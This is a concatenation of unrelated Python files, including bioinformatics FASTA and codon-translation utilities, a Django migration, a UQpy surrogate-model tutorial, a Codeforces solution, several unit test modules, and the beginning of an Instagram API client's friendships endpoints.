"add-1-task-"+str(count)+"-unigram.pickle") count+=1 print(unigramProb)
import sys sys.path.append('../implementations/') from implementations.magicians import magicians for magician in magicians: print(magician.title() + ", that was a great trick!") print("I can't wait to see your next trick, " + magician.title() + ".\n") print("Thank you, everyone. That was a great magic show!")
import sys import re import math import random def convert_fasta (lines): blocks = [] sequence = '' for i in lines: if i[0] == '$': # skip h info continue elif i[0] == '>' or i[0] == '#': if len(sequence) > 0: blocks.append([h,sequence]) sequence = '' # reset containers h = i.strip('\n')[1:] else: h = i.strip('\n')[1:] else: sequence += i.strip('\n') try: blocks.append([h,sequence]) # handle last entry except: print lines raise return blocks def parse_fasta (handle): """ Parse open file as FASTA, return dictionary of headers and sequences as key-value pairs. """ res = {} sequence = '' for i in handle: if i[0] == '$': # skip h info continue elif i[0] == '>' or i[0] == '#': if len(sequence) > 0: res.update({h: sequence}) sequence = '' # reset containers h = i.strip('\n')[1:] else: h = i.strip('\n')[1:] else: sequence += i.strip('\n').upper() res.update({h: sequence}) return res def iter_fasta (handle): """ Parse open file as FASTA. Returns a generator of handle, sequence tuples. """ sequence = '' for i in handle: if i[0] == '$': # skip h info continue elif i[0] == '>' or i[0] == '#': if len(sequence) > 0: yield h, sequence sequence = '' # reset containers h = i.strip('\n')[1:] else: sequence += i.strip('\n').upper() yield h, sequence def fasta2phylip (fasta, handle): ntaxa = len(fasta) nsites = len(fasta[0][1]) handle.write(str(ntaxa)+' '+str(nsites)+'\n') for row in fasta: # phylip format uses space delimiters header = regex.sub('',row[0]).replace(' ','_') handle.write(header+' '+row[1]+'\n') def convert_phylip (lines): """ Convert line input from Phylip format file into Python list object. """ res = [] try: ntaxa, nsites = lines[0].strip('\n').split() except: print lines[0] raise if len(lines) != int(ntaxa) + 1: raise AssertionError ('Number of taxa does not equal header') for line in lines[1:]: header, seq = line.strip('\n').split() res.append( [header, seq] ) return res complement_dict = {'A':'T', 'C':'G', 'G':'C', 'T':'A', 'W':'S', 'R':'Y', 'K':'M', 'Y':'R', 'S':'W', 'M':'K', 'B':'V', 'D':'H', 'H':'D', 'V':'B', '*':'*', 'N':'N', '-':'-'} def reverse_and_complement(seq): rseq = seq[::-1] rcseq = '' for i in rseq: # reverse order rcseq += complement_dict[i] return rcseq codon_dict = {'TTT':'F', 'TTC':'F', 'TTA':'L', 'TTG':'L', 'TCT':'S', 'TCC':'S', 'TCA':'S', 'TCG':'S', 'TAT':'Y', 'TAC':'Y', 'TAA':'*', 'TAG':'*', 'TGT':'C', 'TGC':'C', 'TGA':'*', 'TGG':'W', 'CTT':'L', 'CTC':'L', 'CTA':'L', 'CTG':'L', 'CCT':'P', 'CCC':'P', 'CCA':'P', 'CCG':'P', 'CAT':'H', 'CAC':'H', 'CAA':'Q', 'CAG':'Q', 'CGT':'R', 'CGC':'R', 'CGA':'R', 'CGG':'R', 'ATT':'I', 'ATC':'I', 'ATA':'I', 'ATG':'M', 'ACT':'T', 'ACC':'T', 'ACA':'T', 'ACG':'T', 'AAT':'N', 'AAC':'N', 'AAA':'K', 'AAG':'K', 'AGT':'S', 'AGC':'S', 'AGA':'R', 'AGG':'R', 'GTT':'V', 'GTC':'V', 'GTA':'V', 'GTG':'V', 'GCT':'A', 'GCC':'A', 'GCA':'A', 'GCG':'A', 'GAT':'D', 'GAC':'D', 'GAA':'E', 'GAG':'E', 'GGT':'G', 'GGC':'G', 'GGA':'G', 'GGG':'G', '---':'-', 'XXX':'?'} mixture_regex = re.compile('[WRKYSMBDHVN-]') mixture_dict = {'W':'AT', 'R':'AG', 'K':'GT', 'Y':'CT', 'S':'CG', 'M':'AC', 'V':'AGC', 'H':'ATC', 'D':'ATG', 'B':'TGC', 'N':'ATGC', '-':'ATGC'} #mixture_dict_2 = [ (set(v), k) for k, v in mixture_dict.iteritems() ] ambig_dict = dict(("".join(sorted(v)), k) for k, v in mixture_dict.iteritems()) def translate_nuc (seq, offset, resolve=False, return_list=False): """ Translate nucleotide sequence into amino acid sequence. offset by X shifts sequence to the right by X bases Synonymous nucleotide mixtures are resolved to the corresponding residue. Nonsynonymous nucleotide mixtures are encoded with '?' """ seq = '-'*offset + seq aa_list = [] aa_seq = '' # use to align against reference, for resolving indels # loop over codon sites in nucleotide sequence for codon_site in xrange(0, len(seq), 3): codon = seq[codon_site:codon_site+3] if len(codon) < 3: break # note that we're willing to handle a single missing nucleotide as an ambiguity if codon.count('-') > 1 or '?' in codon: if codon == '---': # don't bother to translate incomplete codons aa_seq += '-' aa_list.append(['-']) else: aa_seq += '?' aa_list.append(['?']) continue # look for nucleotide mixtures in codon, resolve to alternative codons if found num_mixtures = len(mixture_regex.findall(codon)) if num_mixtures == 0: aa = codon_dict[codon] aa_seq += aa aa_list.append([aa]) elif num_mixtures == 1: resolved_AAs = [] for pos in range(3): if codon[pos] in mixture_dict.keys(): for r in mixture_dict[codon[pos]]: rcodon = codon[0:pos] + r + codon[(pos+1):] if codon_dict[rcodon] not in resolved_AAs: resolved_AAs.append(codon_dict[rcodon]) aa_list.append(resolved_AAs) if len(resolved_AAs) > 1: if resolve: # for purposes of aligning AA sequences # it is better to have one of the resolutions # than a completely ambiguous '?' aa_seq += resolved_AAs[0] else: aa_seq += '?' else: aa_seq += resolved_AAs[0] else: aa_seq += '?' aa_list.append(['?']) if return_list: return aa_list return aa_seq # ===================================== # when codon sequence contains non-synonymous mixtures (indicated # by '?' in translated sequence) then expand into all # possible residues in a list-object on which scores are applied def expand (sd): for h in sd.iterkeys(): aaseq = sd[h]['clipped_aa'] nucseq = sd[h]['clipped_nuc'] sd[h].update({'aa_list':expand_single (aaseq, nucseq)}) return sd def expand_single (aaseq, nucseq): aa_list = [] for pos in range(len(aaseq)): if aaseq[pos] == '?': codon = nucseq[(3*pos):(3*(pos+1))] # leave in-frame codon gaps alone if codon == '---': aa_list.append('-') continue if len(codon) < 3: print 'WARNING: partial codon "'+codon+'" detected in sequence ' + nucseq + ' at codon ' + str(pos) print 'query = ' + aaseq print 'h = ' + h sys.exit() rcodons = [codon] while 1: ok_to_stop = True for rcodon in rcodons: for pos in range(3): if rcodon[pos] in mixture_dict.keys(): rcodons.remove(rcodon) for r in mixture_dict[rcodon[pos]]: next_rcodon = rcodon[0:pos] + r + rcodon[(pos+1):] if next_rcodon not in rcodons: rcodons.append(next_rcodon) ok_to_stop = False break # go to next item in list if ok_to_stop: break resolved_AAs = [] for rcodon in rcodons: if codon_dict[rcodon] not in resolved_AAs: resolved_AAs.append(codon_dict[rcodon]) if codon.count('-') > 0: aa_list.append('?') else: aa_list.append(resolved_AAs) """ if '-' in codon: if len(resolved_AAs) > 1: # this will have to be imputed # currently '?' contributes no score aa_list.append('?') else: aa_list.append(resolved_AAs[0]) else: aa_list.append(resolved_AAs) """ else: aa_list.append(aaseq[pos]) return aa_list # ======================================================================= sg_regex = re.compile('[ACGT][N-][ACGT]') def expand_clonal (sd): for h in sd.iterkeys(): query_v3 = sd[h]['clipped_aa'] codon_v3 = sd[h]['clipped_nuc'] new_seq = '' for pos in range(len(query_v3)): if query_v3[pos] == '?': codon = codon_v3[(3*pos):(3*(pos+1))] # leave in-frame codon gaps alone if codon == '---': new_seq += '-' continue if len(codon) < 3: print 'WARNING: partial codon "'+codon+'" detected in sequence ' + codon_v3 + ' at codon ' + str(pos) print 'query = ' + query_v3 print 'h = ' + h sys.exit() rcodons = [codon] while 1: ok_to_stop = True for rcodon in rcodons: for pos in range(3): if rcodon[pos] in mixture_dict.keys(): rcodons.remove(rcodon) for r in mixture_dict[rcodon[pos]]: next_rcodon = rcodon[0:pos] + r + rcodon[(pos+1):] if next_rcodon not in rcodons: rcodons.append(next_rcodon) ok_to_stop = False break # go to next item in list if ok_to_stop: break resolved_AAs = [] for rcodon in rcodons: if codon_dict[rcodon] not in resolved_AAs: resolved_AAs.append(codon_dict[rcodon]) if len(resolved_AAs) > 1: new_seq += '?' else: new_seq += resolved_AAs[0] else: new_seq += query_v3[pos] sd[h].update({'clipped_aa':new_seq}) return sd def patch_gaps (sd): # For clonal sequences (454), singleton 'N's or '-'s are common. # Rather than ignore these incomplete codons, it is better to resolve # them by one of the following procedures: # - if the gap is at a synonymous site, then simply replace the # ambiguous character '?' with that residue # - if the gap is at a nonsynonymous site, then resolve it into the # majority nucleotide and the corresponding residue # I'm not sure this is the best approach... # generate nucleotide frequency vector seqlen = len(sd.values()[0]['clipped_nuc']) nucfreqs = dict([(x,{'A':0, 'C':0, 'G':0, 'T':0}) for x in range(seqlen)]) for h in sd.iterkeys(): nucseq = sd[h]['clipped_nuc'] for pos in range(seqlen): try: nucfreqs[pos][nucseq[pos]] += 1 except: pass # generate majority consensus sequence major_seq = '' for pos in range(seqlen): major_seq += nucfreqs[pos].keys()[nucfreqs[pos].values().index(max(nucfreqs[pos].values()))] for h in sd.iterkeys(): nucseq = sd[h]['clipped_nuc'] if not sg_regex.findall(nucseq): continue nslist = [x for x in nucseq] # edit a.a. sequence based on resolution of broken codon bad_seq = False for sg in sg_regex.finditer(nucseq): nucpos = sg.start()+1 try: nslist[nucpos] = major_seq[nucpos] except: # this is usually caused by a frameshift in the # original sequence that is not handled properly by # the align() function. bad_seq = True break if bad_seq: continue nucseq = ''.join(nslist) sd[h]['clipped_nuc'] = nucseq sd[h]['clipped_aa'] = translate_nuc(nucseq, 0) return sd # ======================================================================= def aalist_to_str (aa_list): res = '' for pos in range(len(aa_list)): if type(aa_list[pos]) == list: res += '[' for char in aa_list[pos]: res += char res += ']' else: res += aa_list[pos] return res # ======================================================================= def gaps2ambig (nucseq): """ Convert all gap characters that are not a proper codon deletion into an ambiguous character. Meant to operate on a nucleotide sequence that is in reading frame. """ aaseq = translate_nuc(nucseq, 0) def plurality_consensus(column, alphabet='ACGT', resolve=False): """ Plurality consensus - nucleotide with highest frequency. In case of tie, report mixtures. """ freqs = {} for char in alphabet: freqs.update({char: 0}) #freqs = {"A": 0, "T": 0, "C": 0, "G": 0, "-": 0} for char in column: if char in alphabet: freqs[char] += 1 elif mixture_dict.has_key(char): # handled ambiguous nucleotides with equal weighting resolutions = mixture_dict[char] for char2 in resolutions: freqs[char2] += 1./len(resolutions) else: # unrecognized nucleotide character pass base = max(freqs, key=lambda n: freqs[n]) max_count = freqs[base] possib = filter(lambda n: freqs[n] == max_count, freqs) if len(possib) == 1: return possib[0] elif "-" in possib: if resolve: possib.remove("-") if len(possib) == 0: return "-" elif len(possib) == 1: return possib[0] else: return ambig_dict["".join(sorted(possib))] else: # gap character overrides ties return "-" else: return ambig_dict["".join(sorted(possib))] def majority_consensus (fasta, threshold = 0.5, alphabet='ACGT', ambig_char = 'N'): """ Return majority-rule consensus sequence. [threshold] = percentage of column that most common character must exceed [alphabet] = recognized character states """ res = '' if len(alphabet) == 0: alphabet = set(fasta[0][1]) columns = transpose_fasta(fasta) for col in columns: cset = set(col) if len(cset) == 1: c = cset.pop() if c not in alphabet: res += ambig_char else: res += c else: counts = [(col.count(c), c) for c in cset if c in alphabet] if len(counts) == 0: res += ambig_char continue counts.sort(reverse=True) # descending order max_count, max_char = counts[0] if max_count / float(len(fasta)) > threshold: res += max_char else: res += ambig_char return res def consensus(fasta, alphabet='ACGT', resolve=False): """ Return plurality consensus of alignment. """ consen = [] columns = transpose_fasta(fasta) for column in columns: consen.append(plurality_consensus(column, alphabet=alphabet, resolve=resolve)) newseq = "".join(consen) """ # Resolve missing data. # Proper indels start and end in-frame. indel_ptn = re.compile("(.{3})*?(?P<indel>(\?{3})+)") indels = [] for match in indel_ptn.finditer(newseq): indels.extend(range(*match.span("indel"))) for column in range(len(consen)): if consen[column] == "?" and column not in indels: consen[column] = consensus(column, resolve=True) return "".join(consen) """ return newseq # ======================================================================= """ transpose_fasta - return an array of alignment columns """ def transpose_fasta (fasta): # some checks to make sure the right kind of object is being sent if type(fasta) is not list: return None if type(fasta[0]) is not list or len(fasta[0]) != 2: return None n_columns = len(fasta[0][1]) res = [] for c in range(n_columns): res.append ( [ s[c] for h, s in fasta ] ) return res def untranspose_fasta(tfasta): nseq = len(tfasta[0]) res = [ '' for s in range(nseq) ] for col in tfasta: for i in range(nseq): res[i] += col[i] return res """ entropy_from_fasta Calculate the mean entropy over columns of an alignment passed as a FASTA object (list of lists). Defaults to the nucleotide alphabet. If a vector of counts is passed, then entropy calculations will be weighted by the frequency of each sequence. Otherwise each sequence will be counted as one instance. NOTE: Non-alphabet characters (e.g., mixtures, gaps) are being simply ignored! Test code: infile = open('/Users/apoon/wip/etoi/screened/ACT 60690_NEF_forward.pre2.screen1', 'rU') fasta = convert_fasta(infile.readlines()) infile.close() counts = [int(h.split('_')[1]) for h, s in fasta] """ def entropy_from_fasta (fasta, alphabet = 'ACGT', counts = None): columns = transpose_fasta (fasta) ents = [] for col in columns: ent = 0. # expand character count in vector if 'counts' argument is given if counts: new_col = [] for i in range(len(col)): new_col.extend( [ col[i] for j in range(counts[i]) ] ) col = new_col for char in alphabet: freq = float(col.count(char)) / len(col) if freq > 0: ent -= freq * math.log(freq, 2) ents.append(ent) mean_ent = sum(ents) / len(ents) return mean_ent def bootstrap(fasta, reps=1): """ Random sampling of columns with replacement from alignment. Returns a FASTA (list of lists) """ nsites = len(fasta[0][1]) seqnames = [h for (h, s) in fasta] res = [] # container for FASTAs tfasta = transpose_fasta(fasta) for rep in range(reps): # randomly sample columns sample = [] for j in range(nsites): sample.append(tfasta[random.randint(0, nsites-1)]) # generate new FASTA from sample seqs = untranspose_fasta(sample) boot = [] for k, s in enumerate(seqs): boot.append([seqnames[k], s]) res.append(boot) if reps == 1: return res[0] else: return res
# Generated by Django 3.2.5 on 2021-07-26 11:39 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('kapsoya', '0006_auto_20210725_1629'), ] operations = [ migrations.AlterField( model_name='post', name='category', field=models.CharField(choices=[('1', 'Security'), ('2', 'Health Emergency'), ('3', 'Entertainment'), ('4', 'Fire Breakouts'), ('5', 'Playground'), ('6', 'Death'), ('7', 'Gym')], max_length=120), ), ]
import timesynth as ts # Initializing TimeSampler time_sampler = ts.TimeSampler(start_time=1642989836, stop_time=1645668236) # Sampling irregular time samples irregular_time_samples = time_sampler.sample_irregular_time(num_points=500, keep_percentage=50) # Initializing Sinusoidal signal # 这里选择了时间序列的波形 sinusoid = ts.signals.Sinusoidal(frequency=0.25) # Initializing Gaussian noise white_noise = ts.noise.GaussianNoise(std=250) # Initializing TimeSeries class with the signal and noise objects timeseries = ts.TimeSeries(sinusoid, noise_generator=white_noise) # Sampling using the irregular time samples samples, signals, errors = timeseries.sample(irregular_time_samples) print(samples)
""" :copyright: (c) 2020 Yotam Rechnitz :license: MIT, see LICENSE for more details """ class Best: def __init__(self, js: dict): try: self._allDamageDoneMostInGame = js["allDamageDoneMostInGame"] except KeyError: self._allDamageDoneMostInGame = 0 try: self._barrierDamageDoneMostInGame = js["barrierDamageDoneMostInGame"] except KeyError: self._barrierDamageDoneMostInGame = 0 try: self._defensiveAssistsMostInGame = js["defensiveAssistsMostInGame"] except KeyError: self._defensiveAssistsMostInGame = 0 try: self._eliminationsMostInGame = js["eliminationsMostInGame"] except KeyError: self._eliminationsMostInGame = 0 try: self._environmentalKillsMostInGame = js["environmentalKillsMostInGame"] except KeyError: self._environmentalKillsMostInGame = 0 try: self._finalBlowsMostInGame = js["finalBlowsMostInGame"] except KeyError: self._finalBlowsMostInGame = 0 try: self._healingDoneMostInGame = js["healingDoneMostInGame"] except KeyError: self._healingDoneMostInGame = 0 try: self._heroDamageDoneMostInGame = js["heroDamageDoneMostInGame"] except KeyError: self._heroDamageDoneMostInGame = 0 try: self._killsStreakBest = js["killsStreakBest"] except KeyError: self._killsStreakBest = 0 try: self._meleeFinalBlowsMostInGame = js["meleeFinalBlowsMostInGame"] except KeyError: self._meleeFinalBlowsMostInGame = 0 try: self._multikillsBest = js["multikillsBest"] except KeyError: self._multikillsBest = 0 try: self._objectiveKillsMostInGame = js["objectiveKillsMostInGame"] except KeyError: self._objectiveKillsMostInGame = 0 try: self._objectiveTimeMostInGame = js["objectiveTimeMostInGame"] except KeyError: self._objectiveTimeMostInGame = 0 try: self._offensiveAssistsMostInGame = js["offensiveAssistsMostInGame"] except KeyError: self._offensiveAssistsMostInGame = 0 try: self._reconAssistsMostInGame = js["reconAssistsMostInGame"] except KeyError: self._reconAssistsMostInGame = 0 try: self._soloKillsMostInGame = js["soloKillsMostInGame"] except KeyError: self._soloKillsMostInGame = 0 try: self._teleporterPadsDestroyedMostInGame = js["teleporterPadsDestroyedMostInGame"] except KeyError: self._teleporterPadsDestroyedMostInGame = 0 try: self._timeSpentOnFireMostInGame = js["timeSpentOnFireMostInGame"] except KeyError: self._timeSpentOnFireMostInGame = 0 try: self._turretsDestroyedMostInGame = js["turretsDestroyedMostInGame"] except KeyError: self._turretsDestroyedMostInGame = 0 @property def allDamageDoneMostInGame(self): return self._allDamageDoneMostInGame @property def barrierDamageDoneMostInGame(self): return self._barrierDamageDoneMostInGame @property def defensiveAssistsMostInGame(self): return self._defensiveAssistsMostInGame @property def eliminationsMostInGame(self): return self._eliminationsMostInGame @property def environmentalKillsMostInGame(self): return self._environmentalKillsMostInGame @property def finalBlowsMostInGame(self): return self._finalBlowsMostInGame @property def healingDoneMostInGame(self): return self._healingDoneMostInGame @property def heroDamageDoneMostInGame(self): return self._heroDamageDoneMostInGame @property def killsStreakBest(self): return self._killsStreakBest @property def meleeFinalBlowsMostInGame(self): return self._meleeFinalBlowsMostInGame @property def multikillsBest(self): return self._multikillsBest @property def objectiveKillsMostInGame(self): return self._objectiveKillsMostInGame @property def objectiveTimeMostInGame(self): return self._objectiveTimeMostInGame @property def offensiveAssistsMostInGame(self): return self._offensiveAssistsMostInGame @property def reconAssistsMostInGame(self): return self._reconAssistsMostInGame @property def soloKillsMostInGame(self): return self._soloKillsMostInGame @property def teleporterPadsDestroyedMostInGame(self): return self._teleporterPadsDestroyedMostInGame @property def timeSpentOnFireMostInGame(self): return self._timeSpentOnFireMostInGame @property def turretsDestroyedMostInGame(self): return self._turretsDestroyedMostInGame
def func01(): print("func01执行了") def func02(): print("func02执行了") def func03(): print("func03执行了") print(__name__)
""" Oakley Function (1 random input, scalar output) ====================================================================== In this example, PCE is used to generate a surrogate model of a sinusoidal function with a single random input and a scalar output. """ # %% md # # Import necessary libraries. # %% import numpy as np import matplotlib.pyplot as plt from UQpy.distributions import Normal from UQpy.surrogates import * # %% md # # Define the sinusoidal function to be approximated. # # Reference: Oakley, J. E., & O'Hagan, A. (2004). Probabilistic sensitivity analysis of complex models: a Bayesian # approach. Journal of the Royal Statistical Society: Series B (Statistical Methodology), 66(3), 751-769. # %% def oakley_function(x): return 5 + x + np.cos(x) # %% md # # Create a distribution object, generate samples and evaluate the function at the samples. # %% np.random.seed(1) dist = Normal(loc=0, scale=2) n_samples = 100 x = dist.rvs(n_samples) y = oakley_function(x) # %% md # # Create an object from the PCE class, construct a total-degree polynomial basis given a maximum polynomial degree, and # compute the PCE coefficients using least squares regression. # %% max_degree = 8 polynomial_basis = TotalDegreeBasis(dist, max_degree) least_squares = LeastSquareRegression() pce_lstsq = PolynomialChaosExpansion(polynomial_basis=polynomial_basis, regression_method=least_squares) pce_lstsq.fit(x,y) # %% md # # Create an object from the PCE class, construct a total-degree polynomial basis given a maximum polynomial degree, and # compute the PCE coefficients using LASSO regression. # %% polynomial_basis = TotalDegreeBasis(dist, max_degree) lasso = LassoRegression() pce_lasso = PolynomialChaosExpansion(polynomial_basis=polynomial_basis, regression_method=lasso) pce_lasso.fit(x,y) # %% md # # Create an object from the PCE class, construct a total-degree polynomial basis given a maximum polynomial degree, and # compute the PCE coefficients using ridge regression. # %% polynomial_basis = TotalDegreeBasis(dist, max_degree) ridge = RidgeRegression() pce_ridge = PolynomialChaosExpansion(polynomial_basis=polynomial_basis, regression_method=ridge) pce_ridge.fit(x, y) # %% md # # PCE surrogate is used to predict the behavior of the function at new samples. # %% x_test = dist.rvs(100) x_test.sort(axis=0) y_test_lstsq = pce_lstsq.predict(x_test) y_test_lasso = pce_lasso.predict(x_test) y_test_ridge = pce_ridge.predict(x_test) # %% md # # Plot training data, true function and PCE surrogate # %% n_samples_ = 1000 x_ = np.linspace(min(x_test), max(x_test), n_samples_) f = oakley_function(x_) plt.figure() plt.plot(x_test, y_test_lstsq, 'g', label='PCE predictor - LSTSQ') plt.plot(x_test, y_test_lasso, 'r', label='PCE predictor - LASSO') plt.plot(x_test, y_test_ridge, 'b', label='PCE predictor - Ridge') plt.scatter(x, y, label='training data') plt.plot(x_, f, 'm', label='function') plt.title('PCE surrogate - prediction accuracy') plt.legend(); plt.show() # %% md # Error Estimation # ----------------- # Construct a validation dataset and get the validation error. # %% # validation sample n_samples = 100000 x_val = dist.rvs(n_samples) y_val = oakley_function(x_val).flatten() # PCE predictions y_pce_lstsq = pce_lstsq.predict(x_val).flatten() y_pce_lasso = pce_lasso.predict(x_val).flatten() y_pce_ridge = pce_ridge.predict(x_val).flatten() # mean absolute errors error_lstsq = np.sum(np.abs(y_val - y_pce_lstsq))/n_samples error_lasso = np.sum(np.abs(y_val - y_pce_lasso))/n_samples error_ridge = np.sum(np.abs(y_val - y_pce_ridge))/n_samples print('Mean absolute error from least squares regression is: ', error_lstsq) print('Mean absolute error from LASSO regression is: ', error_lasso) print('Mean absolute error from ridge regression is: ', error_ridge) print(' ') # mean relative errors error_lstsq = np.sum( np.abs((y_val - y_pce_lstsq)/y_val) )/n_samples error_lasso = np.sum( np.abs((y_val - y_pce_lasso)/y_val) )/n_samples error_ridge = np.sum( np.abs((y_val - y_pce_ridge)/y_val) )/n_samples print('Mean relative error from least squares regression is: ', error_lstsq) print('Mean relative error from LASSO regression is: ', error_lasso) print('Mean relative error from ridge regression is: ', error_ridge) # %% md # Moment Estimation # ----------------- # Returns mean and variance of the PCE surrogate. # %% n_mc = 1000000 x_mc = dist.rvs(n_mc) y_mc = oakley_function(x_mc) mean_mc = np.mean(y_mc) var_mc = np.var(y_mc) print('Moments from least squares regression :', pce_lstsq.get_moments()) print('Moments from LASSO regression :', pce_lasso.get_moments()) print('Moments from Ridge regression :', pce_ridge.get_moments()) print('Moments from Monte Carlo integration: ', mean_mc, var_mc)
#!/usr/bin/env python3 # 664A_gcd.py - Codeforces.com/problemset/problem/664/A by Sergey 2016 import unittest import sys ############################################################################### # Gcd Class (Main Program) ############################################################################### class Gcd: """ Gcd representation """ def __init__(self, test_inputs=None): """ Default constructor """ it = iter(test_inputs.split("\n")) if test_inputs else None def uinput(): return next(it) if it else sys.stdin.readline().rstrip() # Reading single elements [self.a, self.b] = map(int, uinput().split()) def calculate(self): """ Main calcualtion function of the class """ result = 1 if self.a != self.b else self.a return str(result) ############################################################################### # Unit Tests ############################################################################### class unitTests(unittest.TestCase): def test_single_test(self): """ Gcd class testing """ # Constructor test test = "1 2" d = Gcd(test) self.assertEqual(d.a, 1) # Sample test self.assertEqual(Gcd(test).calculate(), "1") # Sample test test = "61803398874989484820458683436563811772030917980576 61803398874989484820458683436563811772030917980576" self.assertEqual(Gcd(test).calculate(), "61803398874989484820458683436563811772030917980576") # Sample test test = "" # self.assertEqual(Gcd(test).calculate(), "0") # My tests test = "" # self.assertEqual(Gcd(test).calculate(), "0") # Time limit test # self.time_limit_test(5000) def time_limit_test(self, nmax): """ Timelimit testing """ import random import timeit # Random inputs test = str(nmax) + " " + str(nmax) + "\n" numnums = [str(i) + " " + str(i+1) for i in range(nmax)] test += "\n".join(numnums) + "\n" nums = [random.randint(1, 10000) for i in range(nmax)] test += " ".join(map(str, nums)) + "\n" # Run the test start = timeit.default_timer() d = Gcd(test) calc = timeit.default_timer() d.calculate() stop = timeit.default_timer() print("\nTimelimit Test: " + "{0:.3f}s (init {1:.3f}s calc {2:.3f}s)". format(stop-start, calc-start, stop-calc)) if __name__ == "__main__": # Avoiding recursion limitaions sys.setrecursionlimit(100000) if sys.argv[-1] == "-ut": unittest.main(argv=[" "]) # Print the result string sys.stdout.write(Gcd().calculate())
# Copyright 2009-2017 Ram Rachum. # This program is distributed under the MIT license. '''Testing module for `nifty_collections.ordered_dict.OrderedDict`.''' from python_toolbox import cute_testing from python_toolbox.nifty_collections.ordered_dict import OrderedDict def test_sort(): '''Test the `OrderedDict.sort` method.''' ordered_dict = OrderedDict(((1, 'a'), (2, 'b'), (3, 'c'))) ordered_dict_copy = ordered_dict.copy() assert ordered_dict == ordered_dict_copy ordered_dict.sort() assert ordered_dict == ordered_dict_copy ordered_dict_copy.sort(key=(lambda x: -x)) assert ordered_dict != ordered_dict_copy assert ordered_dict == dict(ordered_dict) == ordered_dict_copy ordered_dict[4] = ordered_dict_copy[4] = 'd' assert ordered_dict != ordered_dict_copy assert ordered_dict == dict(ordered_dict) == ordered_dict_copy ordered_dict_copy.sort(key=ordered_dict_copy.__getitem__) assert ordered_dict == ordered_dict_copy ordered_dict_copy.sort(key=(lambda x: -x)) assert ordered_dict != ordered_dict_copy assert ordered_dict == dict(ordered_dict) == ordered_dict_copy ordered_dict.sort(key=(lambda x: -x)) assert ordered_dict == ordered_dict_copy second_ordered_dict = OrderedDict(((1+2j, 'b'), (2+3j, 'c'), (3+1j, 'a'))) second_ordered_dict.sort('imag') assert second_ordered_dict == \ OrderedDict(((3+1j, 'a'), (1+2j, 'b'), (2+3j, 'c'))) second_ordered_dict.sort('real', reverse=True) assert second_ordered_dict == \ OrderedDict(((3+1j, 'a'), (2+3j, 'c'), (1+2j, 'b'))) def test_index(): '''Test the `OrderedDict.index` method.''' ordered_dict = OrderedDict(((1, 'a'), (2, 'b'), (3, 'c'))) assert ordered_dict.index(1) == 0 assert ordered_dict.index(3) == 2 assert ordered_dict.index(2) == 1 ordered_dict[2] = 'b' assert ordered_dict.index(1) == 0 assert ordered_dict.index(3) == 2 assert ordered_dict.index(2) == 1 ordered_dict['meow'] = 'frr' assert ordered_dict.index('meow') == 3 with cute_testing.RaiseAssertor(ValueError): ordered_dict.index('Non-existing key') def test_builtin_reversed(): '''Test the `OrderedDict.__reversed__` method.''' ordered_dict = OrderedDict(((1, 'a'), (2, 'b'), (3, 'c'))) assert list(reversed(ordered_dict)) == [3, 2, 1] def test_reversed(): ordered_dict = OrderedDict(((1, 'a'), (2, 'b'), (3, 'c'))) assert ordered_dict.reversed == OrderedDict(((3, 'c'), (2, 'b'), (1, 'a'))) assert type(ordered_dict.reversed) is type(ordered_dict) is OrderedDict
import unittest import javabridge from TASSELpy.TASSELbridge import TASSELbridge try: try: javabridge.get_env() except AttributeError: print("AttributeError: start bridge") TASSELbridge.start() except AssertionError: print("AssertionError: start bridge") TASSELbridge.start() except: raise RuntimeError("Could not start JVM") from TASSELpy.net.maizegenetics.taxa.TaxaList import * from TASSELpy.net.maizegenetics.taxa.TaxaListBuilder import TaxaListBuilder from TASSELpy.java.lang.String import metaString class TaxaListTest(unittest.TestCase): list_builder = TaxaListBuilder() list_builder.add(Taxon('first')) list_builder.add(Taxon('second')) taxa_list = list_builder.build() def test___init__(self): # Load data assert type(self.taxa_list) is TaxaList, "TaxaListBuilder constructure error" self.assertIsInstance(self.taxa_list, TaxaList), "__init__ is error" def test_numberOfTaxa(self): arr = self.taxa_list.numberOfTaxa() self.assertIsInstance(arr, metaInteger) self.assertEqual(arr, 2) def test_taxaName(self): arr1 = self.taxa_list.taxaName(0) arr2 = self.taxa_list.taxaName(1) self.assertIsInstance(arr1, metaString) if __name__ == '__main__': unittest.main(exit=False) TASSELbridge.stop()
import warnings from .common import ClientExperimentalWarning from ..compatpatch import ClientCompatPatch from ..utils import raise_if_invalid_rank_token class FriendshipsEndpointsMixin(object): """For endpoints in ``/friendships/``.""" def autocomplete_user_list(self): """User list for autocomplete""" res = self._call_api( 'friendships/autocomplete_user_list/', query={'followinfo': 'True', 'version': '2'}) if self.auto_patch: [ClientCompatPatch.list_user(user, drop_incompat_keys=self.drop_incompat_keys) for user in res['users']] return res def user_following(self, user_id, rank_token, **kwargs): """ Get user followings :param user_id: :param rank_token: Required for paging through a single feed and can be generated with :meth:`generate_uuid`. You should use the same rank_token for paging through a single user following. :param kwargs: - **query**: Search within the user following - **max_id**: For pagination :return: """ raise_if_invalid_rank_token(rank_token) endpoint = 'friendships/{user_id!s}/following/'.format(**{'user_id': user_id}) query_params = { 'rank_token': rank_token, } query_params.update(kwargs) res = self._call_api(endpoint, query=query_params) if self.auto_patch: [ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys) for u in res.get('users', [])] return res def user_followers(self, user_id, rank_token, **kwargs): """ Get user followers :param user_id: :param rank_token: Required for paging through a single feed and can be generated with :meth:`generate_uuid`. You should use the same rank_token for paging through a single user followers. :param kwargs: - **query**: Search within the user followers - **max_id**: For pagination :return: """ raise_if_invalid_rank_token(rank_token) endpoint = 'friendships/{user_id!s}/followers/'.format(**{'user_id': user_id}) query_params = { 'rank_token': rank_token, } query_params.update(kwargs) res = self._call_api(endpoint, query=query_params) if self.auto_patch: [ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys) for u in res.get('users', [])] return res def friendships_pending(self): """Get pending follow requests""" res = self._call_api('friendships/pending/') if self.auto_patch and res.get('users'): [ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys) for u in res.get('users', [])] return res def friendships_show(self, user_id): """ Get friendship status with user id :param user_id: :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": false, "is_private": false } """ endpoint = 'friendships/show/{user_id!s}/'.format(**{'user_id': user_id}) res = self._call_api(endpoint) return res def friendships_show_many(self, user_ids): """ Get friendship status with mulitple user ids :param user_ids: list of user ids :return: .. code-block:: javascript { "status": "ok", 